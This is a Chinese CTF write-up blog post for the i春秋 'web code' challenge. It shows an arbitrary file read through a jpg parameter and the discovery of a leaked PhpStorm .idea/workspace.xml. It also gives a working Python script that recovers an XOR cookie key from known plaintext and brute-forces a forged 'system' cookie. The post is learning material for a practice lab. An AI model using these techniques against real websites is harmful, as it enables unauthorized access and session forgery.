i春秋 web code

最新推荐文章于 2020-08-05 23:55:25 发布
最新推荐文章于 2020-08-05 23:55:25 发布
阅读量1.6k 收藏
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104416928
版权

打开是一张图片,参数jpg可以读取文件,将参数改为index.php成功读取到base64加密后的源码:

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '<title>file:'.$file.'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
$file = str_replace("config","_", $file);
$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
 * Can you find the flag file?
 *
 */
?>

过滤了[^a-zA-Z0-9.]之外的所有字符,还将config替换为_,然后思路就断了。

后来才知道关键在PhpStorm,它会产生一个.idea文件,里面有个workspace.xml记录了网站的大概结构。

于是访问http://c3c6a0b38c6e4c6ab89695779203418d8225fc36c51749b0.changame.ichunqiu.com/.idea/workspace.xml发现了:
在这里插入图片描述

访问fl3g_ichuqiu.php,因为_被过滤,所以要将它替换为config,直接访问index.php?jpg=fl3gconfigichuqiu.php,得到源码:

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');

function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {       //random()产生length长度的随机字符
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++)	{
        $hash .= $chars[mt_rand(0, $max)];
    } 
    return $hash;
}
//加密
function encrypt($txt,$key){   //txt为明文,key为秘钥
    for($i=0;$i<strlen($txt);$i++){
        $tmp .= chr(ord($txt[$i])+10); //txt的ascii值+10                            //ord()函数返回字符串的首个字符的ASCII值。
    }
    $txt = $tmp;
    $rnd=random(4);                //产生4位随机字符串rnd
    $key=md5($rnd.$key);      //key=随机字符串+key 的MD5加密
    $s=0;
    for($i=0;$i<strlen($txt);$i++){                 
        if($s == 32) $s = 0;
        $ttmp .= $txt[$i] ^ $key[++$s];   //txt与key按位异或
    }
    return base64_encode($rnd.$ttmp);  //结果加上随机数base64加密
}
function decrypt($txt,$key){                        
    $txt=base64_decode($txt);   //将txt base64解密
    $rnd = substr($txt,0,4);   //将txt的随机数去除
    $txt = substr($txt,4);
    $key=md5($rnd.$key);      //key加随机字符串MD5加密


    $s=0;
    for($i=0;$i<strlen($txt);$i++){                 
        if($s == 32) $s = 0;
        $tmp .= $txt[$i]^$key[++$s]; //txt与key异或加密
    }
    for($i=0;$i<strlen($tmp);$i++){
        $tmp1 .= chr(ord($tmp[$i])-10); //txt的ascii值-10
    }
    return $tmp1; //返回结果
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){                 
    echo $flag;
}else{
    setcookie('user',encrypt('guest',$key));
    echo "╮(╯▽╰)╭";
}
?>

获取flag的思路:

1,通过明文guest和网页中的cookies[‘user’]解出key。

2,用解出的key加密system,然后将值赋给cookies[‘user’]。

不过脚本真难写,看着别人的脚本修修改改半天才写出来。。。

# _*_ coding: utf-8 _*
import base64
import requests
import string

#求key部分
url="http://c3c6a0b38c6e4c6ab89695779203418d8225fc36c51749b0.changame.ichunqiu.com/fl3g_ichuqiu.php"
cookie=requests.get(url).cookies['user']
#print cookie

a=base64.b64decode(cookie)
rnd=a[:4]
ttmp=a[4:]
#print txt
#print rnd
#print ttmp
txt=list('guest')

for i in range(5):
    txt[i]=chr(ord(txt[i])+10)
key=list('123456')

for i in range(5):
    key[i]=chr(ord(ttmp[i])^ord(txt[i]))
    
print key	//这里的key不用再MD5解密了,因为加密的时候就是用的MD5之后的key

#加密system部分,key只有5位,system要六位,最后一位爆破
system=list('system')
baopo='1234567890abcdefghijklmn'

for i in range(6):
    system[i]=chr(ord(system[i])+10)
    
payload=[]
str=''
for d in baopo:
    key[5]=d
    
    for i in range(6):
        str+=chr(ord(key[i]) ^ ord(system[i]))
    str=rnd+str
    payload.append(base64.b64encode(str))
    str=''
    
print payload
for i in payload:
    cookies={'user':i}
    a=requests.get(url,cookies=cookies)
    if 'flag' in a.text:
        print a.text

做完这道题脑袋还是有点晕,明天完全自己敲一遍代码,巩固一下。

总结:

一,异或规则

同为0,异为1;

一个数和另外一个数进行两次异或后,是原数本身。A = C^B 那么 B = A ^ C如下例

a -01100001
3 -00000011
   01100010
3 -00000011
   01100001

二,PhpStorm

使用phpstorm 创建的文件里面会有一个.idea文件夹,里面存储这一个配置文件

其中workspace.xml可以显示网站的大致结构。

三,append()方法

append() 方法用于在列表末尾添加新的对象。

天问_Herbert555
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i春秋-web-Code
wojiushilsy的博客
04-14 280
题目要点题目内容解题 题目要点 文件包含 脑洞 题目内容 解题 打开页面,是一张base64加密的动漫图片 在URL中可以看到图片名 尝试访问index源码(修改 hei.jpg 为 index.php ),得到base64加密的源码。 解密得到如下代码: <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time:...
web文件包含 i春秋 code题目
qq_30435981的博客
07-31 1816
网站链接打开来是一张图片,查看源码是没用的base64码,我们可以利用文件包含读一下index.php这文件的代码,/index.php?jpg=index.php,查看代码是base64码,经过base64-Encode,发现是一段函数。 &lt;?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ he...
i春秋 WEB code
A_dmin的博客
06-10 1422
i春秋 WEB code 一天一道CTF题目,能多不能少 打开网页入目的是一张图,查看网页源代码,发现图片是base64的加密,可能存在文件读取,尝试读取index.php的文件,得到源码: <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content-type:text/htm...
【i春秋 CTF大本营 > 竞赛训练营 > CTF训练】—— Writeup 题解 (按答对人数排序)
algae
08-05 747
待补充整理ing
i春秋 一些题目
qq_30435981的博客
08-24 2133
VID 查看网页源代码发现有个文件路径  访问的看到了有三个参数用get方式提交  在url后提三个参数和对应的值就看到了一个1chunqiu.zip  访问就可以下载文件 这里需要进行代码审计  先看log.php界面 if(isset($_POST['username']) &amp;&amp; isset($_POST['password']) &am...
building webservices with java source code
07-20
【标签】"webservices"和"example code"强调了这个压缩包的重点。"webservices"标签表明内容聚焦于Web服务开发,这是一种基于开放标准的互联网通信方法,允许不同系统间的互操作性。"example code"则意味着这里有...
WEB CODE IS FREE
04-10
标题“WEB CODE IS FREE”暗示了我们关注的主题是关于Web开发中的开源代码或者免费可用的Web资源。在Web开发领域,开源代码意味着开发者可以自由地访问、使用、修改和分发源代码,促进了技术的共享与创新。这通常...
book_Web_Code.rar
05-20
"book_Web_Code.rar"这个压缩包文件恰好提供了这样的资源,它包含了大二Web课程中的书本课后任务源代码,旨在帮助学生深入理解Web开发的核心概念并提高实际操作能力。这个压缩包的结构是按照每个单元单独打包,而...
WebCode
03-27
CRUD CI Vue 使用CodeIgniter和Vue.js的简单CRUD 细节 带有REST_Controller库的CodeIgniter 3.1.9 带有Webpack模板的Vue.js 2.5.2 需要的 Node.js和NPM 执照
Machine Learning for the Web_Code 源码
01-17
Machine Learning for the Web_Code 源码 本资源转载自网络,如有侵权,请联系上传者或csdn删除 查看此书详细信息请在美国亚马逊官网搜索此书
i春秋------Misc更新
落花四月
03-25 1506
今天早上起来很开森!因为今天要打比赛了(2018年3月安恒杯线上赛),等到比赛开始得时候,发现自己登陆不上去 想了很久发现自己只是预约了比赛,并没有报名(QAQ ),心疼一下傻傻的自己。现在开始工作: 1: 解题思路:首先要仔细看给出的题目的内容,毕竟题目中已经给出了flag 得到答案:flag{w41c0me_t0_441~} 2: 解题思路:说一句情话(在这里,我想提醒的...
i春秋 WEB phone number
A_dmin的博客
06-19 701
i春秋 WEB phone number 一天一道CTF题目,能多不能少 打开网页是一个登陆页面,还能够注册,注册一个账号登陆进去,发现登录名和电话号码有回显: 点击check按钮,发现会查询你的电话号码~~ 毕竟题目也是提示电话号码嘛!! 想到是不是二次注入~ 重新注册的时候发现提示电话号码必须是字符: 既然只能传入数字,那么其他进制的数字能行吗? 尝试16进制,成功,啊哈哈哈哈哈哈 由于...
i春秋-CTF
爆破胡同的博客
01-19 3263
VID 查看网页源代码发现有个文件路径 访问的看到了有三个参数用get方式提交 在url后提三个参数和对应的值就看到了一个1chunqiu.zip 访问就可以下载文件 这里需要进行代码审计 先看log.php界面if(isset($_POST['username']) && isset($_POST['password']) && isset($_POST['numb
WP 4 i春秋_2017年春秋欢乐赛
segOt
04-20 4493
时间 象棋 时间 多线程、爆破 这道题目给出如下源码<?php header("content-type:text/html;charset=utf-8"); '天下武功唯快不破'; setcookie('token','hello'); show_source(__FILE__); if ($_COOKIE['token']=='hello'){ $txt = file_get_cont
i春秋ctf夺旗赛(第四季)writeup——web
jammny
01-06 1731
前言: 这次的比赛一共有六道web题,接下我会详细介绍解题的步骤以及思路,以便让小白和没有接触过这类题型的小伙伴们能读懂。 第一题,nani 1、打开网页啥都没有,内容一片空白啥。这时候我们应该按F12去查看网页源码。往往很多提示和关键性信息都藏在这里。如图所示: 2、得到提示:./index.php?file=show.php ;看到关键字file,下意识想会不会存在文件包含呢?不急,我们先去访...
i 春秋 web 题 <include>
慢慢变小佬的博客
08-22 2008
打开链接地址:http://454e308408314446b0961f6226b502e7ad8cd9afd5614658.game.ichunqiu.com/ 题题目中以给出提示,这是文件包含题,打开题目链接后出现: 代码中包含一个phpinfo.php文件,试着去打开这个文件,什么也没有发现。而且可以发现改代码是没有防护的文件包含。 既然是关于php的,可以使用php协议 在该链接下...
CTF-i春秋网鼎杯第四场部分writeup题目分析
热门推荐
jihaichen的博客
08-31 1万+
双色块 下载题目发现只有一个文件且为gif文件,可以正常打开,且只存在绿色和紫色两个颜色,分布不均匀。 先丢到winhexv看一下有没有插入其他文件,确实找到了png头文件。 到binwalk分析一下,分离出图片 上面写着key,可能下面用得到,继续分析这张图片无异常 接着分离一下gif,分离出576张图片,是24²   这两个变量应该是代表0,1了 按...
BUUCTF web 高明的黑客 (fuzzing)
H4ppyD0g的博客
02-23 757
提示源码备份www.tar.gz,就访问这个uri,下载一个压缩包,里面有三千多个php文件,打开几个看看,如果有写过小马的就可以很容易发现几乎每个文件都有好多小马。但是大多数都不好用,到这里不会了,看wp。 说是这个题考的模糊测试,也就是fuzzing,又学新知识了。。 知识盲区 Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。 可通过向目标系统提供...
i春秋2020新春疫战 SQL注入类型 writepup
a3320315的博客
02-24 951
招聘简历 这道题目是比较常见的bool注入 打开题目是一个注册登录界面 我们先尝试一下有没有注入点 我们先注册一个账号 这个时候我们在登录页面试一下有没有注入点 很明显的bool注入,1=1是恒成立的,如果and后面的条件不成立,就会返回登录失败~~ exp: # encoding=utf-8 import requests url = 'http://d3be80acd6b647538ef87...
Login system web How can I code
最新发布
06-08
To create a login system web application, you can follow these steps: ...3. On the server-side, check if the username and password match the ones in the database.... I hope this helps get you started!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值